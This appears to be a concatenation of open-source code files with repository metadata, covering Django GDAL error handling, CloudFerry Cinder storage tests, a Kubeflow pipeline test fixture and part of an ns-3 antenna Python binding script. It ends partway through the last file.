| gpl-2.0 |
wsmith323/django | django/contrib/gis/gdal/error.py | 535 | 1996 | """
This module houses the GDAL & SRS Exception objects, and the
check_err() routine which checks the status code returned by
GDAL/OGR methods.
"""
# #### GDAL & SRS Exceptions ####
class GDALException(Exception):
pass
# Legacy name
OGRException = GDALException
class SRSException(Exception):
pass
class OGRIndexError(GDALException, KeyError):
"""
This exception is raised when an invalid index is encountered, and has
the 'silent_variable_feature' attribute set to true. This ensures that
django's templates proceed to use the next lookup type gracefully when
an Exception is raised. Fixes ticket #4740.
"""
silent_variable_failure = True
# #### GDAL/OGR error checking codes and routine ####
# OGR Error Codes
OGRERR_DICT = {
1: (GDALException, 'Not enough data.'),
2: (GDALException, 'Not enough memory.'),
3: (GDALException, 'Unsupported geometry type.'),
4: (GDALException, 'Unsupported operation.'),
5: (GDALException, 'Corrupt data.'),
6: (GDALException, 'OGR failure.'),
7: (SRSException, 'Unsupported SRS.'),
8: (GDALException, 'Invalid handle.'),
}
# CPL Error Codes
# http://www.gdal.org/cpl__error_8h.html
CPLERR_DICT = {
1: (GDALException, 'AppDefined'),
2: (GDALException, 'OutOfMemory'),
3: (GDALException, 'FileIO'),
4: (GDALException, 'OpenFailed'),
5: (GDALException, 'IllegalArg'),
6: (GDALException, 'NotSupported'),
7: (GDALException, 'AssertionFailed'),
8: (GDALException, 'NoWriteAccess'),
9: (GDALException, 'UserInterrupt'),
10: (GDALException, 'ObjectNull'),
}
ERR_NONE = 0
def check_err(code, cpl=False):
"""
Checks the given CPL/OGRERR, and raises an exception where appropriate.
"""
err_dict = CPLERR_DICT if cpl else OGRERR_DICT
if code == ERR_NONE:
return
elif code in err_dict:
e, msg = err_dict[code]
raise e(msg)
else:
raise GDALException('Unknown error code: "%s"' % code)
| bsd-3-clause |
archyufa/CloudFerry | tests/cloudferrylib/os/storage/test_cinder_storage.py | 2 | 10299 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from cinderclient.v1 import client as cinder_client
from oslotest import mockpatch
from cloudferrylib.os.storage import cinder_storage
from cloudferrylib.utils import utils
from tests import test
FAKE_CONFIG = utils.ext_dict(
cloud=utils.ext_dict({'user': 'fake_user',
'password': 'fake_password',
'tenant': 'fake_tenant',
'host': '1.1.1.1',
'auth_url': 'http://1.1.1.1:35357/v2.0/',
'cacert': '',
'insecure': False}),
migrate=utils.ext_dict({'speed_limit': '10MB',
'retry': '7',
'time_wait': 5,
'keep_volume_storage': False,
'keep_volume_snapshots': False}),
mysql=utils.ext_dict({'db_host': '1.1.1.1'}),
storage=utils.ext_dict({'backend': 'ceph',
'rbd_pool': 'volumes',
'volume_name_template': 'volume-',
'host': '1.1.1.1'}))
class CinderStorageTestCase(test.TestCase):
def setUp(self):
super(CinderStorageTestCase, self).setUp()
self.mock_client = mock.Mock()
self.cs_patch = mockpatch.PatchObject(cinder_client, 'Client',
new=self.mock_client)
self.useFixture(self.cs_patch)
self.identity_mock = mock.Mock()
self.compute_mock = mock.Mock()
self.fake_cloud = mock.Mock()
self.fake_cloud.position = 'src'
self.fake_cloud.resources = dict(identity=self.identity_mock,
compute=self.compute_mock)
self.cinder_client = cinder_storage.CinderStorage(FAKE_CONFIG,
self.fake_cloud)
self.fake_volume_0 = mock.Mock()
self.fake_volume_1 = mock.Mock()
self.mock_client().volumes.get.return_value = self.fake_volume_0
def test_get_cinder_client(self):
# To check self.mock_client call only from this test method
self.mock_client.reset_mock()
client = self.cinder_client.get_client(FAKE_CONFIG)
self.mock_client.assert_called_once_with('fake_user', 'fake_password',
'fake_tenant',
'http://1.1.1.1:35357/v2.0/',
cacert='', insecure=False)
self.assertEqual(self.mock_client(), client)
def test_get_volumes_list(self):
fake_volume_list = [self.fake_volume_0, self.fake_volume_1]
self.mock_client().volumes.list.return_value = fake_volume_list
volumes_list = self.cinder_client.get_volumes_list(search_opts=dict())
self.mock_client().volumes.list.\
assert_called_once_with(True, dict(all_tenants=True))
self.assertEqual(volumes_list, fake_volume_list)
def test_create_volume(self):
self.mock_client().volumes.create.return_value = self.fake_volume_0
volume = self.cinder_client.create_volume(100500, name='fake')
self.mock_client().volumes.create.assert_called_once_with(100500,
name='fake')
self.assertEqual(self.fake_volume_0, volume)
def test_get_volume_by_id(self):
volume = self.cinder_client.get_volume_by_id('fake_id')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.assertEqual(self.fake_volume_0, volume)
def test_delete_volume(self):
self.cinder_client.delete_volume('fake_id')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.mock_client().volumes.delete.assert_called_once_with(
self.fake_volume_0)
def test_update_volume(self):
self.cinder_client.update_volume('fake_id', name='new_fake_name')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.mock_client().volumes.update.assert_called_once_with(
self.fake_volume_0, name='new_fake_name')
def test_attach_volume(self):
self.mock_client().volumes.attach.return_value = (
'fake_response', 'fake_body')
response, body = self.cinder_client.attach_volume('fake_vol_id',
'fake_instance_id',
'/fake/mountpoint')
test_args = {'instance_uuid': 'fake_instance_id',
'mountpoint': '/fake/mountpoint',
'mode': 'rw'}
self.mock_client().volumes.get.assert_called_once_with('fake_vol_id')
self.mock_client().volumes.attach.assert_called_once_with(
self.fake_volume_0, **test_args)
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_detach_volume(self):
self.mock_client().volumes.detach.return_value = (
'fake_response', 'fake_body')
response, body = self.cinder_client.detach_volume('fake_vl_id')
self.mock_client().volumes.detach.assert_called_once_with('fake_vl_id')
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_upload_volume_to_image(self):
image = {'os-volume_upload_image': {'image_id': "fake_body"}}
self.mock_client().volumes.upload_to_image.return_value = (
'fake_response', image)
response, body = self.cinder_client.upload_volume_to_image(
'fake_vol_id', True, 'fake_image_name', 'fake_cont_format',
'fake_disk_format')
test_args = {'volume': self.fake_volume_0,
'container_format': 'fake_cont_format',
'force': True,
'image_name': 'fake_image_name',
'disk_format': 'fake_disk_format'}
self.mock_client().volumes.get.assert_called_once_with('fake_vol_id')
self.mock_client().volumes.upload_to_image.assert_called_once_with(
**test_args)
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_read_info(self):
temp = self.cinder_client.get_volumes_list
self.cinder_client.get_volumes_list = mock.Mock()
vol1 = mock.Mock(id="id1",
size='size',
display_name='display_name',
display_description='display_description',
availability_zone='availability_zone',
volume_type='volume_type',
attachments=[{'device': 'device'}],
bootable='bootable')
self.cinder_client.get_volumes_list.return_value = [vol1]
res = self.cinder_client.read_info(id="id1")
self.assertIn('volumes', res)
self.assertEqual(1, len(res['volumes']))
self.assertEqual(vol1.id, res['volumes']['id1']['volume']['id'])
self.cinder_client.get_volumes_list = temp
def test_deploy(self):
vol = {'volume': {'size': 'size1',
'display_name': 'display_name1',
'display_description': 'display_description1',
'volume_type': 'volume_type1',
'availability_zone': 'availability_zone1'},
'meta': {'image': {'id': 'image_id1'}}}
info = {'volumes': {'id1': vol}}
create_volume = mock.Mock()
vol_return = mock.Mock(id="id2")
create_volume.return_value = vol_return
wait_for_status = mock.Mock()
finish = mock.Mock()
attach_vol_to_instance = mock.Mock()
self.cinder_client.create_volume = create_volume
self.cinder_client.wait_for_status = wait_for_status
self.cinder_client.finish = finish
self.cinder_client.attach_volume_to_instance = attach_vol_to_instance
res = self.cinder_client.deploy(info)
self.assertIn(vol_return.id, res)
def test_get_volume_path_iscsi(self):
fake_mysql_return = ('fake_ip:fake_port,3 iqn.2010-10.org.openstack:'
'volume-fake_volume_id fake_lun',)
self.fake_cloud.mysql_connector.execute().fetchone.return_value = (
fake_mysql_return)
volume_path = self.cinder_client.get_volume_path_iscsi('fake_vol_id')
expected_volume_path = (
'/dev/disk/by-path/ip-fake_ip:fake_port-iscsi-iqn.2010-10.org.'
'openstack:volume-fake_volume_id-lun-fake_lun')
self.assertEqual(expected_volume_path, volume_path)
self.fake_cloud.mysql_connector.execute.assert_called_with(
"SELECT provider_location FROM volumes WHERE id='fake_vol_id';")
def test_get_volume_path_iscsi_error(self):
fake_mysql_return = None
self.fake_cloud.mysql_connector.execute.return_value = (
fake_mysql_return)
expected_msg = ('There is no such raw in Cinder DB with the specified '
'volume_id=fake_vol_id')
try:
self.cinder_client.get_volume_path_iscsi('fake_vol_id')
except Exception as e:
self.assertEqual(expected_msg, e.message)
self.fake_cloud.mysql_connector.execute.assert_called_once_with(
"SELECT provider_location FROM volumes WHERE id='fake_vol_id';")
self.assertRaises(Exception,
self.cinder_client.get_volume_path_iscsi,
'fake_vol_id')
| apache-2.0 |
kubeflow/pipelines | sdk/python/kfp/v2/compiler_cli_tests/test_data/pipeline_with_after.py | 1 | 1319 | # Copyright 2020 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kfp import components
from kfp.v2 import dsl
import kfp.v2.compiler as compiler
component_op = components.load_component_from_text("""
name: Print Text
inputs:
- {name: text, type: String}
implementation:
container:
image: alpine
command:
- sh
- -c
- |
set -e -x
echo "$0"
- {inputValue: text}
""")
@dsl.pipeline(name='pipeline-with-after', pipeline_root='dummy_root')
def my_pipeline():
task1 = component_op(text='1st task')
task2 = component_op(text='2nd task').after(task1)
task3 = component_op(text='3rd task').after(task1, task2)
if __name__ == '__main__':
compiler.Compiler().compile(
pipeline_func=my_pipeline,
package_path=__file__.replace('.py', '.json'))
| apache-2.0 |
cyc805/FR_Comparison_LRD | src/antenna/bindings/modulegen__gcc_LP64.py | 14 | 89068 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.antenna', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## angles.h (module 'antenna'): ns3::Angles [struct]
module.add_class('Angles')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## hash.h (module 'core'): ns3::Hasher [class]
module.add_class('Hasher', import_from_module='ns.core')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## antenna-model.h (module 'antenna'): ns3::AntennaModel [class]
module.add_class('AntennaModel', parent=root_module['ns3::Object'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel [class]
module.add_class('CosineAntennaModel', parent=root_module['ns3::AntennaModel'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel [class]
module.add_class('IsotropicAntennaModel', parent=root_module['ns3::AntennaModel'])
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel [class]
module.add_class('ParabolicAntennaModel', parent=root_module['ns3::AntennaModel'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace Hash
nested_module = module.add_cpp_namespace('Hash')
register_types_ns3_Hash(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_Hash(module):
root_module = module.get_root()
## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash32Function_ptr')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash32Function_ptr*')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash32Function_ptr&')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash64Function_ptr')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash64Function_ptr*')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash64Function_ptr&')
## Register a nested module for the namespace Function
nested_module = module.add_cpp_namespace('Function')
register_types_ns3_Hash_Function(nested_module)
def register_types_ns3_Hash_Function(module):
root_module = module.get_root()
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_methods(root_module):
register_Ns3Angles_methods(root_module, root_module['ns3::Angles'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AntennaModel_methods(root_module, root_module['ns3::AntennaModel'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3CosineAntennaModel_methods(root_module, root_module['ns3::CosineAntennaModel'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3IsotropicAntennaModel_methods(root_module, root_module['ns3::IsotropicAntennaModel'])
register_Ns3ParabolicAntennaModel_methods(root_module, root_module['ns3::ParabolicAntennaModel'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
return
def register_Ns3Angles_methods(root_module, cls):
cls.add_output_stream_operator()
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Angles const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Angles const &', 'arg0')])
## angles.h (module 'antenna'): ns3::Angles::Angles() [constructor]
cls.add_constructor([])
## angles.h (module 'antenna'): ns3::Angles::Angles(double phi, double theta) [constructor]
cls.add_constructor([param('double', 'phi'), param('double', 'theta')])
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Vector v) [constructor]
cls.add_constructor([param('ns3::Vector', 'v')])
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Vector v, ns3::Vector o) [constructor]
cls.add_constructor([param('ns3::Vector', 'v'), param('ns3::Vector', 'o')])
## angles.h (module 'antenna'): ns3::Angles::phi [variable]
cls.add_instance_attribute('phi', 'double', is_const=False)
## angles.h (module 'antenna'): ns3::Angles::theta [variable]
cls.add_instance_attribute('theta', 'double', is_const=False)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
